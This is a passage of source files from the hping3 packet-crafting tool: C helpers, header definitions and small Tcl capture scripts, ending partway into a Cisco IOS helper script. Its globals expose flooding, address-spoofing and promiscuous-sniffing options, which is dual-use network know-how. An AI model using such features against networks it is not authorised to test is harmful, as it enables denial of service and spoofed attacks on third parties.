/gethostname.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: gethostname.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: gethostname.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | size_t strlcpy(char *dst, const char *src, size_t siz); 22 | 23 | char *get_hostname(char* addr) 24 | { 25 | static char answer[1024]; 26 | static char lastreq[1024] = {'\0'}; /* last request */ 27 | struct hostent *he; 28 | struct in_addr naddr; 29 | static char *last_answerp = NULL; 30 | 31 | printf(" get hostname..."); fflush(stdout); 32 | printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b" 33 | " " 34 | "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"); 35 | 36 | if (!strcmp(addr, lastreq)) 37 | return last_answerp; 38 | 39 | strlcpy(lastreq, addr, 1024); 40 | inet_aton(addr, &naddr); 41 | he = gethostbyaddr((char*)&naddr, 4, AF_INET); 42 | 43 | if (he == NULL) { 44 | last_answerp = NULL; 45 | return NULL; 46 | } 47 | 48 | strlcpy(answer, he->h_name, 1024); 49 | last_answerp = answer; 50 | 51 | return answer; 52 | } 53 | 54 | -------------------------------------------------------------------------------- /getlhs.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: getlhs.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: getlhs.c,v 1.5 2004/04/09 23:38:56 antirez Exp $ */ 12 | 13 | #include 14 | 15 | #include "hping2.h" 16 | #include "globals.h" 17 | 18 | 19 | int dltype_to_lhs(int dltype) 20 | { 21 | int lhs; 22 | 23 | switch(dltype) { 24 | case DLT_EN10MB: 25 | #ifdef DLT_IEEE802 26 | case DLT_IEEE802: 27 | #endif 28 | lhs = 14; 29 | break; 30 | case DLT_SLIP: 31 | case DLT_SLIP_BSDOS: 32 | lhs = 16; 33 | break; 34 | case DLT_PPP: 35 | case DLT_NULL: 36 | #ifdef DLT_PPP_SERIAL 37 | case DLT_PPP_SERIAL: 38 | #endif 39 | #ifdef DLT_LOOP 40 | case DLT_LOOP: 41 | #endif 42 | lhs = 4; 43 | break; 44 | case DLT_PPP_BSDOS: 45 | lhs = 24; 46 | break; 47 | case DLT_FDDI: 48 | lhs = 13; 49 | break; 50 | case DLT_RAW: 51 | lhs = 0; 52 | break; 53 | #ifdef DLT_IEE802_11 54 | case DLT_IEEE802_11: 55 | lhs = 14; 56 | break; 57 | #endif 58 | case DLT_ATM_RFC1483: 59 | #ifdef DLT_CIP 60 | case DLT_CIP: 61 | #endif 62 | #ifdef DLT_ATM_CLIP 63 | case DLT_ATM_CLIP: 64 | #endif 65 | lhs = 8; 66 | break; 67 | #ifdef DLT_C_HDLC 68 | case DLT_C_HDLC: 69 | lhs = 4; 70 | break; 71 | #endif 72 | #ifdef DLT_LINUX_SLL 73 | case DLT_LINUX_SLL: 74 | #endif 75 | #ifdef DLT_LANE8023 76 | case DLT_LANE8023: 77 | #endif 78 | lhs = 16; 79 | break; 80 | default: 81 | return -1; 82 | break; 83 | } 84 | return lhs; 85 | } 86 | 87 | int get_linkhdr_size(char *ifname) 88 | { 89 | int dltype = pcap_datalink(pcapfp); 90 | 91 | if (opt_debug) 92 | printf("DEBUG: dltype is %d\n", dltype); 93 | 94 | linkhdr_size = dltype_to_lhs(dltype); 95 | return linkhdr_size; 96 | } 97 | -------------------------------------------------------------------------------- /getusec.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: getusec.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: getusec.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | time_t get_usec(void) 17 | { 18 | struct timeval tmptv; 19 | 20 | gettimeofday(&tmptv, NULL); 21 | return tmptv.tv_usec; 22 | } 23 | 24 | time_t milliseconds(void) 25 | { 26 | struct timeval tv; 27 | gettimeofday(&tv, NULL); 28 | return ((tv.tv_sec % 86400) * 1000 + tv.tv_usec / 1000); 29 | } 30 | -------------------------------------------------------------------------------- /globals.h: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: globals.h$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 9$ 9 | */ 10 | 11 | /* $Id: globals.h,v 1.3 2004/06/18 09:53:11 antirez Exp $ */ 12 | 13 | #ifndef _GLOBALS_H 14 | #define _GLOBALS_H 15 | 16 | extern float 17 | rtt_min, 18 | rtt_max, 19 | rtt_avg; 20 | 21 | extern unsigned int 22 | tcp_th_flags, 23 | linkhdr_size, 24 | h_if_mtu, 25 | virtual_mtu, 26 | ip_frag_offset, 27 | signlen, 28 | lsr_length, 29 | ssr_length, 30 | ip_tos, 31 | set_seqnum, 32 | tcp_seqnum, 33 | set_ack, 34 | ip_header_length, 35 | tcp_ack; 36 | 37 | extern unsigned short int 38 | data_size; 39 | 40 | extern int opt_debug, 41 | sockpacket, 42 | sockraw, 43 | sent_pkt, 44 | recv_pkt, 45 | out_of_sequence_pkt, 46 | sending_wait, 47 | opt_rawipmode, 48 | opt_icmpmode, 49 | opt_udpmode, 50 | opt_scanmode, 51 | opt_listenmode, 52 | opt_waitinusec, 53 | opt_numeric, 54 | opt_gethost, 55 | opt_quiet, 56 | opt_relid, 57 | opt_fragment, 58 | opt_df, 59 | opt_mf, 60 | opt_debug, 61 | opt_verbose, 62 | opt_winid_order, 63 | opt_keepstill, 64 | opt_datafromfile, 65 | opt_hexdump, 66 | opt_contdump, 67 | opt_sign, 68 | opt_safe, 69 | opt_end, 70 | opt_traceroute, 71 | opt_seqnum, 72 | opt_incdport, 73 | opt_force_incdport, 74 | opt_icmptype, 75 | opt_icmpcode, 76 | opt_rroute, 77 | opt_tcpexitcode, 78 | opt_badcksum, 79 | opt_tr_keep_ttl, 80 | opt_tcp_timestamp, 81 | opt_tr_stop, 82 | opt_tr_no_rtt, 83 | opt_rand_dest, 84 | opt_rand_source, 85 | opt_lsrr, 86 | opt_ssrr, 87 | opt_beep, 88 | opt_flood, 89 | tcp_exitcode, 90 | src_ttl, 91 | src_id, 92 | base_dst_port, 93 | dst_port, 94 | src_port, 95 | initsport, 96 | sequence, 97 | src_winsize, 98 | src_thoff, 99 | count, 100 | ctrlzbind, 101 | delaytable_index, 102 | eof_reached, 103 | icmp_ip_version, 104 | icmp_ip_ihl, 105 | icmp_ip_tos, 106 | icmp_ip_tot_len, 107 | icmp_ip_id, 108 | icmp_ip_srcport, 109 | icmp_ip_dstport, 110 | opt_force_icmp, 111 | icmp_ip_protocol, 112 | icmp_cksum, 113 | raw_ip_protocol; 114 | 115 | extern unsigned char lsr[255], 116 | ssr[255]; 117 | 118 | extern char ifname[1024], 119 | ifstraddr[1024], 120 | datafilename[1024], 121 | targetname[1024], 122 | targetstraddr[1024], 123 | spoofaddr[1024], 124 | icmp_ip_srcip[1024], 125 | icmp_ip_dstip[1024], 126 | icmp_gwip[1024], 127 | sign[1024], 128 | rsign[1024], 129 | ip_opt[40], 130 | ip_optlen, 131 | *opt_scanports; 132 | 133 | extern struct sockaddr_in icmp_ip_src, icmp_ip_dst, icmp_gw, local, remote; 134 | extern struct itimerval usec_delay; 135 | extern volatile struct delaytable_element delaytable[TABLESIZE]; 136 | extern struct hcmphdr *hcmphdr_p; 137 | 138 | #include 139 | extern pcap_t *pcapfp; 140 | extern char errbuf[PCAP_ERRBUF_SIZE]; 141 | extern struct pcap_pkthdr hdr; 142 | 143 | #endif /* _GLOBALS_H */ 144 | -------------------------------------------------------------------------------- /hcmp.h: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: hcmp.h$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 9$ 9 | */ 10 | 11 | /* Hping Control Message Protocol */ 12 | 13 | #define HCMP_RESTART 1 14 | #define HCMP_SOURCE_QUENCH 2 15 | #define HCMP_SOURCE_STIRUP 3 16 | #define HCMP_CHPROTO 4 /* still unused */ 17 | 18 | struct hcmphdr 19 | { 20 | __u8 type; 21 | union 22 | { 23 | __u16 seqnum; 24 | __u32 usec; 25 | } typedep; 26 | }; 27 | -------------------------------------------------------------------------------- /hex.c: -------------------------------------------------------------------------------- 1 | /* hex.c -- hex to binary convertion (and vice versa). 2 | * Copyright (C) 2003 Salvatore Sanfilippo 3 | * All rights reserved. 4 | * $Id: hex.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ 5 | */ 6 | 7 | #include 8 | 9 | static char hval[256] = { 10 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 11 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 12 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 13 | 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 255, 255, 255, 255, 255, 255, 14 | 255, 10, 11, 12, 13, 14, 15, 255, 255, 255, 255, 255, 255, 255, 255, 255, 15 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 16 | 255, 10, 11, 12, 13, 14, 15, 255, 255, 255, 255, 255, 255, 255, 255, 255, 17 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 18 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 19 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 20 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 21 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 22 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 23 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 24 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 25 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, }; 26 | 27 | static char hcharset[16] = "0123456789abcdef"; 28 | 29 | /* Convert hex data in the string pointed by 'hexstr' in binary, and 30 | * write the result of the conversion to 'dest'. 31 | * On success 0 is returned, on error non-zero. 32 | * 'dest' should point to at least len/2 bytes of data, 33 | * len must be an even number. 34 | * If len == -1, the function calls strlen() against 'hexstr' to 35 | * get the length. */ 36 | int hextobin(void *dest, char *hexstr, int len) 37 | { 38 | int i, binlen; 39 | char *s = hexstr; 40 | unsigned char *d = dest; 41 | 42 | if (len == -1) 43 | len = strlen(hexstr); 44 | if (len % 2) 45 | return 1; /* error, odd count */ 46 | binlen = len / 2; 47 | for (i = 0; i < binlen; i++) { 48 | int high, low; 49 | 50 | high = hval[((unsigned)*s)&0xFF]; 51 | low = hval[((unsigned)*(s+1))&0xFF]; 52 | if (high == 255 || low == 255) 53 | return 1; /* invalid char in hex string */ 54 | high <<= 4; 55 | *d = high|low; 56 | d++; 57 | s+=2; 58 | } 59 | return 0; 60 | } 61 | 62 | /* Convert binary data pointed by 'bin' of length 'len' into an hex string 63 | * rappresentation, writing it at 'dest'. The 'dest' buffer should 64 | * have enough space to hold (len*2)+1 bytes. The result of the 65 | * conversion is nul-terminated. 66 | * 67 | * This function can't fail. */ 68 | void bintohex(char *dest, void *bin, int len) 69 | { 70 | unsigned char *b = bin; 71 | int i, high, low; 72 | 73 | for (i = 0; i < len; i++) { 74 | low = *b & 0xF; 75 | high = (*b & 0xF0) >> 4; 76 | *dest++ = hcharset[high]; 77 | *dest++ = hcharset[low]; 78 | b++; 79 | } 80 | } 81 | 82 | /* This example main show the usage. */ 83 | #ifdef TESTMAIN 84 | #include 85 | int main(int argc, char **argv) 86 | { 87 | unsigned char *buf; 88 | char *xbuf; 89 | int hlen, blen, i; 90 | 91 | if (argc == 1) 92 | exit(1); 93 | 94 | /* Convert from hex to binary */ 95 | hlen = strlen(argv[1]); 96 | blen = (hlen+1)/2; 97 | buf = malloc(blen); 98 | if (!buf) 99 | exit(1); 100 | hextobin(buf, argv[1], -1); 101 | for (i = 0; i < blen; i++) { 102 | printf("%02x", buf[i]); 103 | } 104 | printf("\n"); 105 | 106 | /* and from binary to hex */ 107 | xbuf = malloc((blen*2)+1); 108 | if (!xbuf) 109 | exit(1); 110 | bintohex(xbuf, buf, blen); 111 | printf("%s\n", xbuf); 112 | return 0; 113 | } 114 | #endif 115 | -------------------------------------------------------------------------------- /hex.h: -------------------------------------------------------------------------------- 1 | #ifndef __HEX_H 2 | #define __HEX_H 3 | 4 | int hextobin(void *dest, char *hexstr, int len); 5 | void bintohex(char *dest, void *bin, int len); 6 | 7 | #endif 8 | -------------------------------------------------------------------------------- /hstring.c: -------------------------------------------------------------------------------- 1 | /* hstring.c - Random string-related functions for hping. 2 | * Copyright(C) 2003 Salvatore Sanfilippo 3 | * All rights reserved */ 4 | 5 | /* $Id: hstring.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 6 | 7 | #include 8 | #include 9 | #include 10 | 11 | /* return 1 if the string looks like an integer number 12 | * otherwise 0 is returned. 13 | * 14 | * this function is equivalent to this regexp: 15 | * [:space:]*-{0,1}[0-9]+[:space:]* 16 | * in english: 17 | * (0-inf spaces)(zero or one -)(1-inf digits)(0-inf spaces) 18 | */ 19 | int strisnum(char *s) 20 | { 21 | int digits = 0; /* used to return false if there aren't digits */ 22 | 23 | while(isspace(*s)) 24 | s++; /* skip initial spaces */ 25 | if (*s == '-') /* negative number? */ 26 | s++; 27 | while(*s) { 28 | if (isspace(*s)) { /* skip spaces in the tail */ 29 | while(isspace(*s)) 30 | s++; 31 | if (*s) return 0; /* but don't allow other tail chars */ 32 | return digits ? 1 : 0; 33 | } 34 | if (!isdigit(*s)) 35 | return 0; 36 | s++; 37 | digits++; 38 | } 39 | return digits ? 1 : 0; 40 | } 41 | 42 | /* function similar to strtok() more convenient when we know the 43 | * max number of tokens, to tokenize with a single call. 44 | * Unlike strtok(), strftok() is thread safe. 45 | * 46 | * ARGS: 47 | * 'sep' is a string that contains all the delimiter characters 48 | * 'str' is the string to tokenize, that will be modified 49 | * 'tptrs' is an array of char* poiters that will contain the token pointers 50 | * 'nptrs' is the length of the 'tptrs' array. 51 | * 52 | * RETURN VALUE: 53 | * The number of extracted tokens is returned. 54 | */ 55 | size_t strftok(char *sep, char *str, char **tptrs, size_t nptrs) 56 | { 57 | size_t seplen = strlen(sep); 58 | size_t i, j = 0; 59 | int inside = 0; 60 | 61 | while(*str) { 62 | for(i = 0; i < seplen; i++) { 63 | if (sep[i] == *str) 64 | break; 65 | } 66 | if (i == seplen) { /* no match */ 67 | if (!inside) { 68 | tptrs[j++] = str; 69 | inside = 1; 70 | } 71 | } else { /* match */ 72 | if (inside) { 73 | *str = '\0'; 74 | if (j == nptrs) 75 | return j; 76 | inside = 0; 77 | } 78 | } 79 | str++; 80 | } 81 | return j; 82 | } 83 | -------------------------------------------------------------------------------- /hstring.h: -------------------------------------------------------------------------------- 1 | #ifndef HPING_HSTRNIG_H 2 | #define HPING_HSTRING_H 3 | 4 | int strisnum(char *s); 5 | size_t strftok(char *sep, char *str, char **tptrs, size_t nptrs); 6 | 7 | #endif 8 | -------------------------------------------------------------------------------- /if_promisc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: if_promisc.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 2$ 9 | */ 10 | 11 | /* $Id: if_promisc.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "hping2.h" 22 | #include "globals.h" 23 | 24 | int if_promisc_on(int s) 25 | { 26 | struct ifreq ifr; 27 | 28 | strlcpy(ifr.ifr_name, ifname, IFNAMSIZ); 29 | if ( ioctl(s, SIOCGIFFLAGS, &ifr) == -1) { 30 | perror("[if_prommisc_on] ioctl(SIOCGIFFLAGS)"); 31 | return -1; 32 | } 33 | 34 | if (!(ifr.ifr_flags & IFF_PROMISC)) { 35 | ifr.ifr_flags |= IFF_PROMISC; 36 | if ( ioctl(s, SIOCSIFFLAGS, &ifr) == -1) { 37 | perror("[if_promisc_on] ioctl(SIOCSIFFLAGS)"); 38 | return -1; 39 | } 40 | } 41 | return 0; 42 | } 43 | 44 | int if_promisc_off(int s) 45 | { 46 | struct ifreq ifr; 47 | 48 | strlcpy(ifr.ifr_name, ifname, IFNAMSIZ); 49 | if ( ioctl(s, SIOCGIFFLAGS, &ifr) == -1) { 50 | perror("[if_promisc_off] ioctl(SIOCGIFFLAGS)"); 51 | return -1; 52 | } 53 | 54 | if (ifr.ifr_flags & IFF_PROMISC) { 55 | ifr.ifr_flags ^= IFF_PROMISC; 56 | if ( ioctl(s, SIOCSIFFLAGS, &ifr) == -1) { 57 | perror("[if_promisc_off] ioctl(SIOCSIFFLAGS)"); 58 | return -1; 59 | } 60 | } 61 | return 0; 62 | } 63 | -------------------------------------------------------------------------------- /img/.xvpics/favicon.pnm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/img/.xvpics/favicon.pnm -------------------------------------------------------------------------------- /img/.xvpics/hping_icon.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/img/.xvpics/hping_icon.jpg -------------------------------------------------------------------------------- /img/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/img/favicon.ico -------------------------------------------------------------------------------- /img/favicon.pnm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/img/favicon.pnm -------------------------------------------------------------------------------- /img/hping_big.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/img/hping_big.jpg -------------------------------------------------------------------------------- /img/hping_icon.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/img/hping_icon.jpg -------------------------------------------------------------------------------- /in.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2000,2001 Salvatore Sanfilippo */ 2 | 3 | #ifndef ARS_IPPROTO_IP 4 | 5 | #define ARS_IPPROTO_IP 0 /* Dummy protocol for TCP. */ 6 | #define ARS_IPPROTO_HOPOPTS 0 /* IPv6 Hop-by-Hop options. */ 7 | #define ARS_IPPROTO_ICMP 1 /* Internet Control Message Protocol. */ 8 | #define ARS_IPPROTO_IGMP 2 /* Internet Group Management Protocol. */ 9 | #define ARS_IPPROTO_IPIP 4 /* IPIP tunnels (older KA9Q tunnels use 94).*/ 10 | #define ARS_IPPROTO_TCP 6 /* Transmission Control Protocol. */ 11 | #define ARS_IPPROTO_EGP 8 /* Exterior Gateway Protocol. */ 12 | #define ARS_IPPROTO_IGRP 9 /* Cisco(R)'s IGRP Routing Portocol. */ 13 | #define ARS_IPPROTO_PUP 12 /* PUP protocol. */ 14 | #define ARS_IPPROTO_UDP 17 /* User Datagram Protocol. */ 15 | #define ARS_IPPROTO_IDP 22 /* XNS IDP protocol. */ 16 | #define ARS_IPPROTO_TP 29 /* SO Transport Protocol Class 4. */ 17 | #define ARS_IPPROTO_IPV6 41 /* IPv6 header. */ 18 | #define ARS_IPPROTO_ROUTING 43 /* IPv6 routing header. */ 19 | #define ARS_IPPROTO_FRAGMENT 44 /* IPv6 fragmentation header. */ 20 | #define ARS_IPPROTO_RSVP 46 /* Reservation Protocol. */ 21 | #define ARS_IPPROTO_GRE 47 /* General Routing Encapsulation. */ 22 | #define ARS_IPPROTO_ESP 50 /* encapsulating security payload. */ 23 | #define ARS_IPPROTO_AH 51 /* authentication header. */ 24 | #define ARS_IPPROTO_ICMPV6 58 /* ICMPv6. */ 25 | #define ARS_IPPROTO_NONE 59 /* IPv6 no next header. */ 26 | #define ARS_IPPROTO_DSTOPTS 60 /* IPv6 destination options. */ 27 | #define ARS_IPPROTO_MTP 92 /* Multicast Transport Protocol. */ 28 | #define ARS_IPPROTO_ENCAP 98 /* Encapsulation Header. */ 29 | #define ARS_IPPROTO_PIM 103 /* Protocol Independent Multicast. */ 30 | #define ARS_IPPROTO_COMP 108 /* Compression Header Protocol. */ 31 | #define ARS_IPPROTO_RAW 255 /* Raw IP packets. */ 32 | 33 | #endif 34 | -------------------------------------------------------------------------------- /interface.h: -------------------------------------------------------------------------------- 1 | #ifndef __HPING_INTERFACE_H 2 | #define __HPING_INTERFACE_H 3 | 4 | #ifndef _LINUX_MII_H 5 | #define _LINUX_MII_H 6 | 7 | /* network interface ioctl's for MII commands */ 8 | #ifndef SIOCGMIIPHY 9 | #define SIOCGMIIPHY (SIOCDEVPRIVATE) /* Read from current PHY */ 10 | #define SIOCGMIIREG (SIOCDEVPRIVATE+1) /* Read any PHY register */ 11 | #define SIOCSMIIREG (SIOCDEVPRIVATE+2) /* Write any PHY register */ 12 | #define SIOCGPARAMS (SIOCDEVPRIVATE+3) /* Read operational parameters */ 13 | #define SIOCSPARAMS (SIOCDEVPRIVATE+4) /* Set operational parameters */ 14 | #endif 15 | 16 | /* This data structure is used for all the MII ioctl's */ 17 | struct mii_data { 18 | __u16 phy_id; 19 | __u16 reg_num; 20 | __u16 val_in; 21 | __u16 val_out; 22 | }; 23 | 24 | /* Basic Mode Control Register */ 25 | #define MII_BMCR 0x00 26 | #define MII_BMCR_RESET 0x8000 27 | #define MII_BMCR_LOOPBACK 0x4000 28 | #define MII_BMCR_100MBIT 0x2000 29 | #define MII_BMCR_AN_ENA 0x1000 30 | #define MII_BMCR_ISOLATE 0x0400 31 | #define MII_BMCR_RESTART 0x0200 32 | #define MII_BMCR_DUPLEX 0x0100 33 | #define MII_BMCR_COLTEST 0x0080 34 | 35 | /* Basic Mode Status Register */ 36 | #define MII_BMSR 0x01 37 | #define MII_BMSR_CAP_MASK 0xf800 38 | #define MII_BMSR_100BASET4 0x8000 39 | #define MII_BMSR_100BASETX_FD 0x4000 40 | #define MII_BMSR_100BASETX_HD 0x2000 41 | #define MII_BMSR_10BASET_FD 0x1000 42 | #define MII_BMSR_10BASET_HD 0x0800 43 | #define MII_BMSR_NO_PREAMBLE 0x0040 44 | #define MII_BMSR_AN_COMPLETE 0x0020 45 | #define MII_BMSR_REMOTE_FAULT 0x0010 46 | #define MII_BMSR_AN_ABLE 0x0008 47 | #define MII_BMSR_LINK_VALID 0x0004 48 | #define MII_BMSR_JABBER 0x0002 49 | #define MII_BMSR_EXT_CAP 0x0001 50 | 51 | #define MII_PHY_ID1 0x02 52 | #define MII_PHY_ID2 0x03 53 | 54 | /* Auto-Negotiation Advertisement Register */ 55 | #define MII_ANAR 0x04 56 | /* Auto-Negotiation Link Partner Ability Register */ 57 | #define MII_ANLPAR 0x05 58 | #define MII_AN_NEXT_PAGE 0x8000 59 | #define MII_AN_ACK 0x4000 60 | #define MII_AN_REMOTE_FAULT 0x2000 61 | #define MII_AN_ABILITY_MASK 0x07e0 62 | #define MII_AN_FLOW_CONTROL 0x0400 63 | #define MII_AN_100BASET4 0x0200 64 | #define MII_AN_100BASETX_FD 0x0100 65 | #define MII_AN_100BASETX_HD 0x0080 66 | #define MII_AN_10BASET_FD 0x0040 67 | #define MII_AN_10BASET_HD 0x0020 68 | #define MII_AN_PROT_MASK 0x001f 69 | #define MII_AN_PROT_802_3 0x0001 70 | 71 | /* Auto-Negotiation Expansion Register */ 72 | #define MII_ANER 0x06 73 | #define MII_ANER_MULT_FAULT 0x0010 74 | #define MII_ANER_LP_NP_ABLE 0x0008 75 | #define MII_ANER_NP_ABLE 0x0004 76 | #define MII_ANER_PAGE_RX 0x0002 77 | #define MII_ANER_LP_AN_ABLE 0x0001 78 | 79 | #endif /* _LINUX_MII_H */ 80 | 81 | #define HPING_IFNAME_LEN 24 82 | #define HPING_IFACE_MAX 64 83 | #define HPING_IFADDR_MAX 16 84 | 85 | /* hping interface rappresentation */ 86 | struct hpingif { 87 | char hif_name[HPING_IFNAME_LEN]; 88 | in_addr_t hif_addr[HPING_IFADDR_MAX]; /* ipv4 addresses */ 89 | in_addr_t hif_baddr[HPING_IFADDR_MAX]; /* ipv4 broadcast addresses */ 90 | int hif_naddr; 91 | int hif_loopback; 92 | int hif_ptp; 93 | int hif_promisc; 94 | int hif_broadcast; 95 | int hif_nolink; /* only set with MII-capable devices */ 96 | int hif_mtu; 97 | int hif_index; /* only useful for linux sockpacket version */ 98 | }; 99 | 100 | int hping_get_interfaces(struct hpingif *hif, int ilen); 101 | 102 | #endif 103 | -------------------------------------------------------------------------------- /ip_opt_build.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: memunlock.c$ 4 | * $other_author: Mika 5 | * $other_copyright: Copyright (C) 1999 Mika 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 2$ 9 | */ 10 | 11 | /* $Id: ip_opt_build.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | #include "hping2.h" 21 | #include "globals.h" 22 | 23 | unsigned char ip_opt_build(char* ip_opt) 24 | { 25 | unsigned char optlen = 0; 26 | unsigned long ip; 27 | 28 | memset(ip_opt, 1, sizeof(ip_opt)); 29 | 30 | if (opt_lsrr) 31 | { 32 | if (lsr_length<=39) 33 | { 34 | memcpy(ip_opt, &lsr, lsr_length); 35 | optlen += lsr_length; 36 | } 37 | else 38 | { 39 | printf("Warning: loose source route is too long, discarding it"); 40 | opt_lsrr=0; 41 | } 42 | } 43 | 44 | if (opt_ssrr) 45 | { 46 | if (ssr_length+optlen<=39) 47 | { 48 | memcpy(ip_opt + optlen, &ssr, ssr_length); 49 | optlen += ssr_length; 50 | } 51 | else 52 | { 53 | printf("Warning: strict source route is too long, discarding it"); 54 | opt_ssrr=0; 55 | } 56 | } 57 | 58 | if (opt_rroute) 59 | { 60 | if (optlen<=33) 61 | { 62 | ip_opt[optlen]=IPOPT_RR; 63 | ip_opt[optlen+1]=39-optlen; 64 | ip_opt[optlen+2]=8; 65 | ip=inet_addr("1.2.3.4"); 66 | memcpy(ip_opt+optlen+3,&ip,4); 67 | optlen=39; 68 | } 69 | else 70 | { 71 | printf("Warning: no room for record route, discarding option\n"); 72 | opt_rroute=0; 73 | } 74 | } 75 | 76 | if (optlen) 77 | { 78 | optlen = (optlen + 3) & ~3; 79 | ip_opt[optlen-1] = 0; 80 | return optlen; 81 | } 82 | else 83 | return 0; 84 | } 85 | 86 | -------------------------------------------------------------------------------- /lib/README: -------------------------------------------------------------------------------- 1 | Note: scripts in this directory are all under the GPL license, if not 2 | otherwise specified in the top comments of the source code. 3 | -------------------------------------------------------------------------------- /lib/apd.htcl: -------------------------------------------------------------------------------- 1 | while {1} { 2 | set xx [hping recv -hexdata eth0 0 100] 3 | foreach x $xx { 4 | puts "$x\n" 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /lib/apd2.htcl: -------------------------------------------------------------------------------- 1 | source "hpingstdlib.htcl" 2 | 3 | proc recv {} { 4 | set xx [hping recv -hexdata eth0 0 100] 5 | foreach x $xx { 6 | if {[GetIpDaddr $x] == "192.168.1.20"} { 7 | puts "$x\n" 8 | } 9 | } 10 | after 10 recv 11 | } 12 | 13 | after 10 recv 14 | vwait forever 15 | -------------------------------------------------------------------------------- /lib/ciscoios.htcl: -------------------------------------------------------------------------------- 1 | ################################################################################ 2 | # 3 | # Helper functions 4 | # This will be part of the hping standard library (possibly modified) 5 | # 6 | 7 | # Return the name of the output interface for address addr 8 | proc outifname addr { 9 | set ifa [hping outifa $addr] 10 | set interfaces [hping iflist] 11 | foreach i $interfaces { 12 | if {$ifa == [lindex $i 1]} { 13 | return [lindex $i 0] 14 | } 15 | } 16 | error "Unable to find the output interface name for $addr" 17 | } 18 | 19 | proc GetApdField {protocol field packet} { 20 | set re 